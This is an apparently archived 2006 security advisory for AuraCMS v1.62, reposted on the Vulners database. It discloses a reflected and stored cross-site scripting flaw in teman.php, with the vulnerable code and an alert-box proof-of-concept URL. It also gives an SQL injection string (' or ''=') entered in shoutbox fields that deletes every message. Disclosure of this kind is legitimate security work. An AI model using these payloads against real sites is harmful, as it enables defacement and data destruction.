Vulners
Lucene search
01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
`by : iFX a.k.a inversFX
_______________________________
[ [email protected] ]
[ [email protected] ]
-------------------------------
locate : Indonesia, Jakarta
--------------------------------
date : 29/06/2006
--------------------------------
title : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - [email protected]
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
--------------------------------
PoC :
--------------------------------------------------------------------
1. in 'teman.php' we can see the code :
.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....
we found something here, that's variable $judul_artikel
so we can xss from the url :
1st ex:
http://localhost/teman.php?judul_artikel=<script>alert("mati
dah gwa!!!")</script>
2nd ex:
or we can send an artikel to admin and the title had the
XSS code, so when anonymous is
opening the index.php, the script are running.
---------------------------------------------------------------------
2. we found something here that can be delete all
shoutbox message.
as usually we can shout anonymously with fake name, mail,
pesan.
here when I insert
name = ' or ''=' <== old SQL
injection code
mail = test_string <== you can fill it with free mail
address
pesan = ' or ''=' <== old SQL injection code
then all message on it clear amazingly....
----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------
sory for my words In English, cuz I often REMED!!!
_________________
/Shout :| |X|
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius,
||||||||. |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe,
Shock-3d, G4mMa, Big_Red_One } |
-------------------------------------------------------------------------------------
|OK | Apply | Cancel |
----------------------
========================================================================================
Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/
Asah pengetahuanmu tentang Piala Dunia di
http://netkuis.telkom.net/pialadunia/
========================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4